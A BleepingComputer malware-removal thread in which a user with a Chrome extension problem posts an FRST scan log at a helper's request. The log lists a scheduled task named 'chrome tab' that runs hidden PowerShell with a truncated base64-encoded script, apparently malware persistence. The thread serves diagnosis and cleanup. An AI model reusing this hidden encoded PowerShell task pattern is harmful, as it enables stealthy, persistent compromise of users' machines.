Hello, recently I have been having issues with a chrome extension called bundle that opens and closes chrome randomly and it gets very annoying. I would love if someone could help me fix this in a timely manner. Thank you in advance
Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.
Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.
Bundle chrome extension
Started by
miggybruh
, Jul 16 2022 12:55 AM
-
This topic is locked
27 replies to this topic
Back to top
#2
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 16 July 2022 - 01:56 AM
Hi there,
I am axe0 and I will be helping you with your computer problems.
Please follow these rules
- Refrain from making changes to your system, unless instructed to, so I know the exact state of your system. This includes installing or uninstalling programs, deleting files, modifying the registry, running scanners or tools of any kind.
- Follow the provided instructions in the order they are posted.
- If you have any problem with a tool or instructions, or have questions, please stop and ask me before moving on.
- Do not run any tool more than once, unless instructed to.
- Copy and paste log files inside your reply, unless otherwise instructed.
- Make sure to use Notepad for all logs, ensure Wordwrap is unchecked. In Notepad, click Format and uncheck Word wrap if it is checked
- Share as many details about your problem as possible, the more you share the easier it will be to solve your problem.
- I may not reply immediately because these logs can take some time to analyze. If it takes more than 48 hours you'll be notified. Feel free to PM me with a link to your thread if you haven't received a reply after 48 hours.
- Please try to reply within 24 up to 48 hours to ensure quick and efficient removal of malware. If there's no response from you within 3 days, I will bump your thread. If there hasn't been a response from you after 5 days then your thread will be closed.
- Stick with me until the end to ensure there are no remnants of malware left. When there is no malware present you will get a confirmation from me.
----------------------------------------------
FRST logs
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.
- Right-click FRST then click "Run as administrator".
- When the tool opens, click Yes to disclaimer.
- Press the Scan button.
- When finished, it will produce a log called FRST.txt and Addition.txt in the same directory the tool was run from.
- Please copy and paste both logs in your next reply.
===============================================
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- Content of FRST.txt
- Content of Additiontxt
Kind regards,
Axe0
Axe0
#3
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 16 July 2022 - 02:23 PM
here is my FRST.txt results
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Origin\Origin.exe ->) (Electronic Arts, Inc. -> ) C:\Program Files (x86)\Origin\QtWebEngineProcess.exe <3>
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Globalhop Ltd -> ) C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.5.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_11.2205.23.0_x64__8wekyb3d8bbwe\Time.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBar.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32699856 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [RestMinder] => C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.114\Installer\chrmstp.exe [2022-07-04] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
Edge:
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2021-07-09]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-15]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
Chrome:
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-16]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-06-14]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2020-07-31]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11152008 2022-07-14] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10452496 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
